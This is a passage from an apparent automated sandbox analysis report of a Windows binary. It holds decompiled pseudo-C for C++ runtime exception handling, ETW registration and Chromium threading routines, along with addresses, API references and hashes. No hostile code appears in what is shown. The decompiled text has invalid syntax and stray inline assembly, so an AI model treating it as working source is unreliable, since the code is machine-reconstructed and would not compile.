																_t185 = memcpy( &_v104,  *((intOrPtr*)( *_t182 + 0x10)) + _t214, _t215 << 2);
																_t238 = _t238 + 0xc;
																__eflags = _v104 - _t185;
																if(_v104 <= _t185) {
																	__eflags = _t185 - _v100;
																	if(_t185 <= _v100) {
																		_t218 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t187 =  *( *((intOrPtr*)(_t206 + 0x1c)) + 0xc);
																			_t221 =  *_t187;
																			_t188 =  &(_t187[1]);
																			__eflags = _t188;
																			_v36 = _t188;
																			_t189 = _v88;
																			_v40 = _t221;
																			_v24 = _t189;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t228 = _v36;
																				_t234 = _t221;
																				__eflags = _t234;
																				if(_t234 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t191 = E00D1435F( &_v84,  *_t228,  *((intOrPtr*)(_t206 + 0x1c)));
																						_t238 = _t238 + 0xc;
																						__eflags = _t191;
																						if(_t191 != 0) {
																							break;
																						}
																						_t234 = _t234 - 1;
																						_t228 = _t228 + 4;
																						__eflags = _t234;
																						if(_t234 > 0) {
																							continue;
																						} else {
																							_t218 = _v20;
																							_t189 = _v24;
																							_t221 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t228);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t206);
																					L67();
																					_t238 = _t238 + 0x30;
																				}
																				L43:
																				_t220 = _v16;
																				goto L44;
																				L40:
																				_t218 = _t218 + 1;
																				_t189 = _t189 + 0x10;
																				_v20 = _t218;
																				_v24 = _t189;
																				__eflags = _t218 - _v92;
																			} while (_t218 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t220 = _t220 + 1;
																_t182 = _v44;
																_t214 = _v32 + 0x14;
																_v16 = _t220;
																_v32 = _t214;
																__eflags = _t220 - _v56;
															} while (_t220 < _v56);
															_t222 = _a20;
															_t229 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00CFF3D0(_t206, _t222, _t229, __eflags);
														_t208 = _t206;
													}
													__eflags = ( *_t222 & 0x1fffffff) - 0x19930521;
													if(( *_t222 & 0x1fffffff) < 0x19930521) {
														L59:
														_t156 = L00D13D51(_t206, _t208, _t220, _t222, _t229);
														__eflags =  *(_t156 + 0x1c);
														if( *(_t156 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t222[7];
														if(_t222[7] != 0) {
															L52:
															_t161 = _t222[8] >> 2;
															__eflags = _t161 & 0x00000001;
															if((_t161 & 0x00000001) == 0) {
																_push(_t222[7]);
																_t162 = E00D14184();
																_t208 = _t206;
																__eflags = _t162;
																if(_t162 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *((intOrPtr*)(L00D13D51(_t206, _t208, _t220, _t222, _t229) + 0x10)) = _t206;
																_t170 = L00D13D51(_t206, _t208, _t220, _t222, _t229);
																_t210 = _v8;
																 *((intOrPtr*)(_t170 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t177 = _t222[8] >> 2;
															__eflags = _t177 & 0x00000001;
															if((_t177 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t206 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t206 + 0x14)) != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(L00D13D51(_t206, _t208, _t220, _t222, _t229) + 0x1c));
										_t200 = L00D13D51(_t206, _t208, _t220, _t222, _t229);
										_push(_v16);
										 *(_t200 + 0x1c) = _t229;
										_t201 = E00D14184();
										_t210 = _t206;
										if(_t201 != 0) {
											goto L23;
										} else {
											_t222 = _v16;
											_t258 =  *_t222 - _t229;
											if( *_t222 <= _t229) {
												L61:
												E00D0D639(_t206, _t210, _t220, _t222, _t229, __eflags);
											} else {
												while(1) {
													_t210 =  *((intOrPtr*)(_t229 + _t222[1] + 4));
													if(L00D13F57( *((intOrPtr*)(_t229 + _t222[1] + 4)), _t258, 0xd43db0) != 0) {
														goto L62;
													}
													_t229 = _t229 + 0x10;
													_t205 = _v20 + 1;
													_v20 = _t205;
													_t258 = _t205 -  *_t222;
													if(_t205 >=  *_t222) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t206);
											E00CFF3D0(_t206, _t222, _t229, __eflags);
											_t208 =  &_v64;
											L00CFED5C();
											E00CFF35C( &_v64, 0xd3ed44);
											L63:
											 *((intOrPtr*)(L00D13D51(_t206, _t208, _t220, _t222, _t229) + 0x10)) = _t206;
											_t164 = L00D13D51(_t206, _t208, _t220, _t222, _t229);
											_t208 = _v8;
											 *(_t164 + 0x14) = _v8;
											__eflags = _t229;
											if(_t229 == 0) {
												_t229 = _a8;
											}
											E00CFF630(_t208, _t229, _t206);
											L00D13F34(_a8, _a16, _t222);
											_t167 = L00D13F4C(_t222);
											_t238 = _t238 + 0x10;
											_push(_t167);
											E00D1421E(_t206, _t208, _t220, _t222, _t229, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x00d145c4
0x00d145cd
0x00d145d6
0x00d145dc
0x00d145e4
0x00d145e6
0x00d145e9
0x00d145ef
0x00d14968
0x00d14968
0x00d1496d
0x00d14971
0x00d14975
0x00d14976
0x00d14979
0x00d1497a
0x00d1497b
0x00d1497e
0x00d14980
0x00d14983
0x00d14984
0x00d14985
0x00d14988
0x00d1498d
0x00d1498d
0x00d14990
0x00d14993
0x00d14995
0x00d14997
0x00d14997
0x00d1499d
0x00d149a2
0x00d149a5
0x00d149a7
0x00d149aa
0x00d149ad
0x00d149ae
0x00d149bc
0x00d149c1
0x00d149c6
0x00d149c9
0x00d149cc
0x00d149cf
0x00d149d2
0x00d149d3
0x00d149d6
0x00d149de
0x00d149e0
0x00d149e4
0x00000000
0x00d149e4
0x00d149ed
0x00d145fe
0x00d145fe
0x00d14607
0x00d14704
0x00d14704
0x00d14707
0x00000000
0x00d14636
0x00d14636
0x00d1463b
0x00000000
0x00d14641
0x00d14641
0x00d14649
0x00d14906
0x00d14906
0x00d1464f
0x00d14654
0x00d14657
0x00d1465c
0x00d14663
0x00d14668
0x00000000
0x00d146a0
0x00d146a8
0x00d1470c
0x00d1470c
0x00d1470f
0x00d14712
0x00d14714
0x00d14717
0x00d1471a
0x00d14720
0x00d148d1
0x00d148d1
0x00d148d4
0x00000000
0x00d148d6
0x00d148d6
0x00d148d9
0x00000000
0x00d148df
0x00d148ef
0x00d148f4
0x00000000
0x00d148f4
0x00d148d9
0x00d14726
0x00d14726
0x00d1472a
0x00000000
0x00d14730
0x00d14730
0x00d14737
0x00d1474f
0x00d1474f
0x00d14752
0x00d14755
0x00d1476b
0x00d14770
0x00d14773
0x00d14776
0x00d14779
0x00d1477c
0x00d1477f
0x00d14782
0x00d14788
0x00d14788
0x00d1478b
0x00d1478e
0x00d1479d
0x00d1479e
0x00d1479e
0x00d147a0
0x00d147a3
0x00d147a9
0x00d147ac
0x00d147b2
0x00d147b4
0x00d147b7
0x00d147ba
0x00d147c3
0x00d147c6
0x00d147c8
0x00d147c8
0x00d147cb
0x00d147ce
0x00d147d1
0x00d147d4
0x00d147d7
0x00d147dc
0x00d147dd
0x00d147de
0x00d147df
0x00d147e0
0x00d147e3
0x00d147e5
0x00d147e7
0x00000000
0x00d147e9
0x00d147e9
0x00d147f2
0x00d147f7
0x00d147fa
0x00d147fc
0x00000000
0x00000000
0x00d147fe
0x00d147ff
0x00d14802
0x00d14804
0x00000000
0x00d14806
0x00d14806
0x00d14809
0x00d1480c
0x00000000
0x00d1480c
0x00000000
0x00d14804
0x00d14820
0x00d14826
0x00d14829
0x00d1482c
0x00d1482f
0x00d14830
0x00d14835
0x00d14836
0x00d14839
0x00d1483c
0x00d1483f
0x00d14842
0x00d14843
0x00d14848
0x00d14848
0x00d1484b
0x00d1484b
0x00000000
0x00d1480f
0x00d1480f
0x00d14810
0x00d14813
0x00d14816
0x00d14819
0x00d14819
0x00000000
0x00d1481e
0x00d147ba
0x00d147ac
0x00d1484e
0x00d14851
0x00d14852
0x00d14855
0x00d14858
0x00d1485b
0x00d1485e
0x00d1485e
0x00d14867
0x00d1486a
0x00d1486a
0x00d14782
0x00d1486d
0x00d14871
0x00d14873
0x00d14876
0x00d1487c
0x00d1487c
0x00d14884
0x00d14889
0x00d148f7
0x00d148f7
0x00d148fc
0x00d14900
0x00000000
0x00000000
0x00000000
0x00000000
0x00d1488b
0x00d1488b
0x00d1488f
0x00d148a1
0x00d148a4
0x00d148a7
0x00d148a9
0x00d148c0
0x00d148c4
0x00d148ca
0x00d148cb
0x00d148cd
0x00000000
0x00d148cf
0x00000000
0x00d148cf
0x00d148ab
0x00d148b0
0x00d148b3
0x00d148b8
0x00d148bb
0x00000000
0x00d148bb
0x00d14891
0x00d14894
0x00d14897
0x00d14899
0x00000000
0x00d1489b
0x00d1489b
0x00d1489f
0x00000000
0x00000000
0x00000000
0x00000000
0x00d1489f
0x00d14899
0x00d1488f
0x00d14739
0x00d14739
0x00d14740
0x00000000
0x00d14742
0x00d14742
0x00d14749
0x00000000
0x00000000
0x00000000
0x00000000
0x00d14749
0x00d14740
0x00d14737
0x00d1472a
0x00d146aa
0x00d146b2
0x00d146b5
0x00d146ba
0x00d146be
0x00d146c1
0x00d146c7
0x00d146ca
0x00000000
0x00d146cc
0x00d146cc
0x00d146cf
0x00d146d1
0x00d14907
0x00d14907
0x00000000
0x00d146d7
0x00d146df
0x00d146ea
0x00000000
0x00000000
0x00d146f3
0x00d146f6
0x00d146f7
0x00d146fa
0x00d146fc
0x00000000
0x00d14702
0x00000000
0x00d14702
0x00000000
0x00d146fc
0x00d146d7
0x00d1490c
0x00d1490c
0x00d1490e
0x00d1490f
0x00d14916
0x00d14919
0x00d14927
0x00d1492c
0x00d14931
0x00d14934
0x00d14939
0x00d1493c
0x00d1493f
0x00d14941
0x00d14943
0x00d14943
0x00d14948
0x00d14954
0x00d1495a
0x00d1495f
0x00d14962
0x00d14963
0x00000000
0x00d14963
0x00d146ca
0x00d146a8
0x00d14668
0x00d14649
0x00d1463b
0x00d14607

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00D146C1
type_info::operator==.LIBVCRUNTIME ref: 00D146E3
___TypeMatch.LIBVCRUNTIME ref: 00D147F2
CatchIt.LIBVCRUNTIME ref: 00D14843
IsInExceptionSpec.LIBVCRUNTIME ref: 00D148C4
_UnwindNestedFrames.LIBCMT ref: 00D14948
CallUnexpected.LIBVCRUNTIME ref: 00D14963

Strings

csm, xrefs: 00D1471A
csm, xrefs: 00D1466E
csm, xrefs: 00D14601

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: b025621c810ba47f95d050d63a8a323338bba88281f39dc145594ccda560c8ca
Instruction ID: 152d4e793a14df07967150eb2c0d816f478919697b384548b25429cabc88f205
Opcode Fuzzy Hash: b025621c810ba47f95d050d63a8a323338bba88281f39dc145594ccda560c8ca
Instruction Fuzzy Hash: 98B14871800209BFCF29DFA4E8819EEBBB5FF15310B184169E8156B252DB71DA91CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 190libraryloaderCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00CF9035
EventRegister.ADVAPI32(00D54C08,00CF9180,00000000,00000018,?,?,?,?,00D54C08,?,00CF8FA4), ref: 00CF90DA
GetModuleHandleExW.KERNEL32(00000000,api-ms-win-eventing-provider-l1-1-0.dll,FFFFFFFF), ref: 00CF90F8
GetModuleHandleExW.KERNEL32(00000000,advapi32.dll,FFFFFFFF), ref: 00CF910A
GetProcAddress.KERNEL32(FFFFFFFF,EventSetInformation), ref: 00CF911C
FreeLibrary.KERNEL32(FFFFFFFF), ref: 00CF9151

Strings

api-ms-win-eventing-provider-l1-1-0.dll, xrefs: 00CF90F1
advapi32.dll, xrefs: 00CF9103
EventSetInformation, xrefs: 00CF9114

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: HandleModule$AddressEventFreeLibraryProcRegister_strlen
String ID: EventSetInformation$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
API String ID: 2182669159-147808218
Opcode ID: f17d4b56a8132c02c5e5daedcafaad0c4a2acc3d91da87803f239f787f06a7ad
Instruction ID: 7a0609ab4dfd395ad56a0f9dd825d20ca0138fe09b7cfe78bf98f79dfca979e4
Opcode Fuzzy Hash: f17d4b56a8132c02c5e5daedcafaad0c4a2acc3d91da87803f239f787f06a7ad
Instruction Fuzzy Hash: 4851FF7160030A9FDB148F15DC48EBB7BEAEF88350B158529FA5A97391DB30ED11CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CDC9A0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00CDC9A0(intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _v16;
				signed int _v20;
				char _v36;
				void _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr* _t58;
				signed int _t60;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t72;
				char* _t79;
				intOrPtr _t80;
				signed int _t82;
				signed int _t83;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				signed int _t96;
				intOrPtr _t103;
				signed int _t107;
				signed int _t113;
				signed int _t115;
				intOrPtr _t116;
				intOrPtr* _t118;
				intOrPtr _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t124;
				void* _t125;
				void* _t126;
				intOrPtr _t128;
				void* _t144;

				_t126 = _t125 - 0x20;
				_t49 =  *0xd40014; // 0xfbddd969
				_v20 = _t49 ^ _t124;
				_t51 =  *0xd54b9c;
				_t89 =  *0xd43e38; // 0x0
				_t110 =  *[fs:0x2c];
				if(_t51 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t89 * 4)) + 4))) {
					_t51 = L00CFDC67(_t51, 0xd54b9c);
					_t126 = _t126 + 4;
					__eflags =  *0xd54b9c - 0xffffffff;
					if(__eflags == 0) {
						L00CC8CE0(0xd54b98);
						_t51 = L00CFDCDD(0xd54b9c);
						_t126 = _t126 + 4;
					}
				}
				__imp__TryAcquireSRWLockExclusive(0xd54b98);
				if(_t51 == 0) {
					L00CC8CF0(_t79, 0xd54b98, _t110, __eflags, _t144);
				}
				_t118 = _a4;
				_t53 =  *0xd54bac;
				_t92 =  *0xd43e38; // 0x0
				_t111 =  *[fs:0x2c];
				if( *0xd54bac >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t92 * 4)) + 4))) {
					_t53 = L00CFDC67(_t53, 0xd54bac);
					_t126 = _t126 + 4;
					__eflags =  *0xd54bac - 0xffffffff;
					if( *0xd54bac == 0xffffffff) {
						 *0xd54ba8 = 0;
						_t53 = L00CFDCDD(0xd54bac);
						_t126 = _t126 + 4;
					}
				}
				if( *0xd54ba8 == 0) {
					 *_t118 = 0;
					goto L22;
				} else {
					_t56 =  *0xd54ba4;
					_t96 =  *0xd43e38; // 0x0
					if( *0xd54ba4 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t96 * 4)) + 4))) {
						L00CFDC67(_t56, 0xd54ba4);
						_t126 = _t126 + 4;
						__eflags =  *0xd54ba4 - 0xffffffff;
						if( *0xd54ba4 == 0xffffffff) {
							 *0xd54ba0 = 0;
							L00CFDCDD(0xd54ba4);
							_t126 = _t126 + 4;
						}
					}
					_t113 = _a12;
					_t116 = _a8;
					_t53 =  *0xd54ba0;
					_t119 = _t116;
					_t80 = _t113;
					if(_t53 == 0) {
						L8:
						asm("sbb edx, ebx");
						__eflags = _t116 - _t119 - 0x989680;
						asm("sbb edx, 0x0");
						if(_t116 - _t119 >= 0x989680) {
							 *((char*)(_t53 + 0x104)) = 1;
							_t119 = _t116;
							_t80 = _a12;
						}
						_push(0x108);
						_t58 = L00CFDBBC();
						_t128 = _t126 + 4;
						_t115 = _t58;
						 *_t58 = 0;
						_t22 = _t58 + 4; // 0x4
						L00CC8CE0(_t22);
						asm("xorps xmm0, xmm0");
						asm("movups [edi+0x8], xmm0");
						asm("movups [edi+0x18], xmm0");
						asm("movups [edi+0x28], xmm0");
						asm("movups [edi+0x38], xmm0");
						asm("movups [edi+0x48], xmm0");
						asm("movups [edi+0x58], xmm0");
						asm("movups [edi+0x68], xmm0");
						asm("movups [edi+0x78], xmm0");
						asm("movups [edi+0x88], xmm0");
						asm("movups [edi+0x98], xmm0");
						asm("movups [edi+0xa8], xmm0");
						asm("movups [edi+0xb8], xmm0");
						asm("movups [edi+0xc8], xmm0");
						asm("movups [edi+0xd8], xmm0");
						asm("movups [edi+0xe8], xmm0");
						 *((intOrPtr*)(_t115 + 0xfc)) = _t80;
						 *((intOrPtr*)(_t115 + 0xf8)) = _t119;
						 *((intOrPtr*)(_t115 + 0x100)) = 0;
						 *((char*)(_t115 + 0x104)) = 0;
						__eflags = _t115;
						if(_t115 != 0) {
							asm("lock inc dword [edi]");
						}
						_t60 =  *0xd54ba0;
						__eflags = _t60;
						if(_t60 != 0) {
							__eflags =  *((char*)(_t60 + 0x104));
							if( *((char*)(_t60 + 0x104)) == 0) {
								__eflags = _t115;
								if(_t115 != 0) {
									asm("lock inc dword [edi]");
								}
								_t106 =  *((intOrPtr*)(_t60 + 0x100));
								 *((intOrPtr*)(_t60 + 0x100)) = _t115;
								__eflags =  *((intOrPtr*)(_t60 + 0x100));
								if(__eflags != 0) {
									asm("lock dec dword [ecx]");
									if(__eflags == 0) {
										E00CDD5A0(_t80, _t115, _t119, _t106);
										_t128 = _t128 + 4;
									}
								}
							}
						}
						__eflags = _t115;
						if(_t115 != 0) {
							asm("lock inc dword [edi]");
						}
						_t61 =  *0xd54ba0;
						 *0xd54ba0 = _t115;
						__eflags =  *0xd54ba0;
						if(__eflags != 0) {
							asm("lock dec dword [eax]");
							if(__eflags == 0) {
								E00CDD5A0(_t80, _t115, _t119, _t61);
								_t128 = _t128 + 4;
							}
						}
						__imp__ReleaseSRWLockExclusive(0xd54b98);
						_v48 = _t128;
						_v44 = _t128 - 0x10;
						_t82 = _a8 -  *((intOrPtr*)(_t115 + 0xf8));
						_t120 = _a12;
						asm("sbb esi, [edi+0xfc]");
						asm("adc ecx, 0x7fffffff");
						asm("adc ecx, 0x0");
						__eflags = _t82 + 1 - 2;
						asm("sbb ecx, 0x0");
						if(__eflags >= 0) {
							_t111 = 0;
							_v40 = 0x3938700 - _t82;
							asm("sbb edx, esi");
							_t83 = _t82 & 0xffffff00 | __eflags > 0x00000000;
							__eflags = _t83;
							_t69 =  ==  ? _v40 : 0 >> 0x1f;
							__eflags = _t83;
							_t103 =  ==  ? 0 : 0x80badbad;
							__eflags = _t103;
						} else {
							_t111 = 0x7fffffff;
							asm("adc ecx, 0x0");
							__eflags = _t120;
							_t69 =  <  ? 0xffffffff : 0;
							_t103 =  <  ? 0x7fffffff : 0x7fffffff;
						}
						_t121 = _v44;
						 *((intOrPtr*)(_t121 + 8)) = _t69;
						 *((intOrPtr*)(_t121 + 0xc)) = _t103;
						_push(0x14);
						_t70 = L00CFDBBC();
						E00CC52D0(_t70, 0xcdd6e0, E00CDD740);
						 *((intOrPtr*)(_t121 + 4)) = _t70;
						_t79 =  &_v36;
						_t72 = L00CC4C80(_t79, "MonitorNextJankWindowIfNecessary", "..\\..\\base\\threading\\scoped_blocking_call_internal.cc", 0xba);
						 *_t121 = _t79;
						_t53 = E00CCB430(_t72, _t111, __eflags);
						_t118 = _a4;
						 *_t118 = _t115;
						goto L25;
					} else {
						_t107 =  *(_t53 + 0xfc);
						asm("adc ecx, 0x0");
						_t87 = _t107 >> 0x1f;
						_t119 =  !=  ? _t87 : 0x3938700 +  *((intOrPtr*)(_t53 + 0xf8));
						_t111 = _t113;
						_t116 = _a8;
						_t80 =  ==  ? _t107 : _t87 + 0x80000000;
						asm("sbb ecx, ebx");
						if(_t116 >= 0x3938700) {
							goto L8;
						} else {
							_t118 = _a4;
							 *_t118 = _t53;
							asm("lock inc dword [eax]");
							L22:
							__imp__ReleaseSRWLockExclusive(0xd54b98);
							L25:
							E00CFE643(_t53, _t79, _v20 ^ _t124, _t111, _t115, _t118);
							return _t118;
						}
					}
				}
			}

0x00cdc9a6
0x00cdc9a9
0x00cdc9b0
0x00cdc9b3
0x00cdc9b8
0x00cdc9be
0x00cdc9ce
0x00cdcccf
0x00cdccd4
0x00cdccd7
0x00cdccde
0x00cdcce9
0x00cdccf3
0x00cdccf8
0x00cdccf8
0x00cdccde
0x00cdc9d9
0x00cdc9e1
0x00cdccc0
0x00cdccc0
0x00cdc9e7
0x00cdc9ea
0x00cdc9ef
0x00cdc9f5
0x00cdca05
0x00cdcd05
0x00cdcd0a
0x00cdcd0d
0x00cdcd14
0x00cdcd1a
0x00cdcd29
0x00cdcd2e
0x00cdcd2e
0x00cdcd14
0x00cdca12
0x00cdcbe5
0x00000000
0x00cdca18
0x00cdca18
0x00cdca1d
0x00cdca33
0x00cdcd3b
0x00cdcd40
0x00cdcd43
0x00cdcd4a
0x00cdcd50
0x00cdcd5f
0x00cdcd64
0x00cdcd64
0x00cdcd4a
0x00cdca39
0x00cdca3c
0x00cdca3f
0x00cdca44
0x00cdca46
0x00cdca4a
0x00cdca94
0x00cdca98
0x00cdca9a
0x00cdcaa0
0x00cdcaa3
0x00cdcaa5
0x00cdcaac
0x00cdcaae
0x00cdcaae
0x00cdcab1
0x00cdcab6
0x00cdcabb
0x00cdcabe
0x00cdcac0
0x00cdcac6
0x00cdcac9
0x00cdcace
0x00cdcad1
0x00cdcad5
0x00cdcad9
0x00cdcadd
0x00cdcae1
0x00cdcae5
0x00cdcae9
0x00cdcaed
0x00cdcaf1
0x00cdcaf8
0x00cdcaff
0x00cdcb06
0x00cdcb0d
0x00cdcb14
0x00cdcb1b
0x00cdcb22
0x00cdcb28
0x00cdcb2e
0x00cdcb38
0x00cdcb3f
0x00cdcb41
0x00cdcb43
0x00cdcb43
0x00cdcb46
0x00cdcb4b
0x00cdcb4d
0x00cdcb4f
0x00cdcb56
0x00cdcc89
0x00cdcc8b
0x00cdcc8d
0x00cdcc8d
0x00cdcc90
0x00cdcc96
0x00cdcc9c
0x00cdcc9e
0x00cdcca4
0x00cdcca7
0x00cdccae
0x00cdccb3
0x00cdccb3
0x00cdcca7
0x00cdcc9e
0x00cdcb56
0x00cdcb5c
0x00cdcb5e
0x00cdcb60
0x00cdcb60
0x00cdcb63
0x00cdcb68
0x00cdcb6e
0x00cdcb70
0x00cdcb72
0x00cdcb75
0x00cdcb78
0x00cdcb7d
0x00cdcb7d
0x00cdcb75
0x00cdcb85
0x00cdcb8b
0x00cdcb91
0x00cdcb97
0x00cdcb9d
0x00cdcba0
0x00cdcbad
0x00cdcbb6
0x00cdcbb9
0x00cdcbbc
0x00cdcbbf
0x00cdcbf8
0x00cdcc01
0x00cdcc04
0x00cdcc06
0x00cdcc14
0x00cdcc16
0x00cdcc1a
0x00cdcc1c
0x00cdcc1c
0x00cdcbc1
0x00cdcbc1
0x00cdcbd8
0x00cdcbdb
0x00cdcbdd
0x00cdcbe0
0x00cdcbe0
0x00cdcc1f
0x00cdcc22
0x00cdcc25
0x00cdcc28
0x00cdcc2a
0x00cdcc40
0x00cdcc45
0x00cdcc48
0x00cdcc5b
0x00cdcc63
0x00cdcc65
0x00cdcc70
0x00cdcc73
0x00000000
0x00cdca4c
0x00cdca4c
0x00cdca5d
0x00cdca67
0x00cdca6c
0x00cdca77
0x00cdca79
0x00cdca7c
0x00cdca83
0x00cdca85
0x00000000
0x00cdca87
0x00cdca87
0x00cdca8a
0x00cdca8c
0x00cdcbeb
0x00cdcbf0
0x00cdcc75
0x00cdcc7a
0x00cdcc88
0x00cdcc88
0x00cdca85
0x00cdca4a

APIs

TryAcquireSRWLockExclusive.KERNEL32(00D54B98,?,?,?,?,?,char_traits::copy overlapped range,?,?,00CC9CF5), ref: 00CDC9D9
ReleaseSRWLockExclusive.KERNEL32(00D54B98,?,?,?,?,?,?,char_traits::copy overlapped range,?,?,00CC9CF5), ref: 00CDCBF0
__Init_thread_header.LIBCMT ref: 00CDCCCF
__Init_thread_header.LIBCMT ref: 00CDCD05
__Init_thread_header.LIBCMT ref: 00CDCD3B

Strings

..\..\base\threading\scoped_blocking_call_internal.cc, xrefs: 00CDCC50
MonitorNextJankWindowIfNecessary, xrefs: 00CDCC55

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Init_thread_header$ExclusiveLock$AcquireRelease
String ID: ..\..\base\threading\scoped_blocking_call_internal.cc$MonitorNextJankWindowIfNecessary
API String ID: 3190562832-733433259
Opcode ID: 428b99a4a8b1dd405db53a8a4fe93a82dbf4906efca5815889c29195892c3136
Instruction ID: 950dc7ca68a0b006beddc5aade3f21ad14d09ef2d81920007273052b0855e5cc
Opcode Fuzzy Hash: 428b99a4a8b1dd405db53a8a4fe93a82dbf4906efca5815889c29195892c3136
Instruction Fuzzy Hash: 3271E131E007469BD714CF28C891BA5B3B1BF95314F15832AED6A87391EB70A9D4CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB11F0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CB11F0(void* __ebx, void* __fp0) {
				void* __edi;
				void* __esi;
				intOrPtr _t11;
				void* _t19;
				void* _t22;
				signed int _t23;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				void* _t61;

				_t61 = __fp0;
				_t22 = __ebx;
				_t11 =  *0xd464d4; // 0x0
				_t23 =  *0xd43e38; // 0x0
				_t24 =  *((intOrPtr*)( *[fs:0x2c] + _t23 * 4));
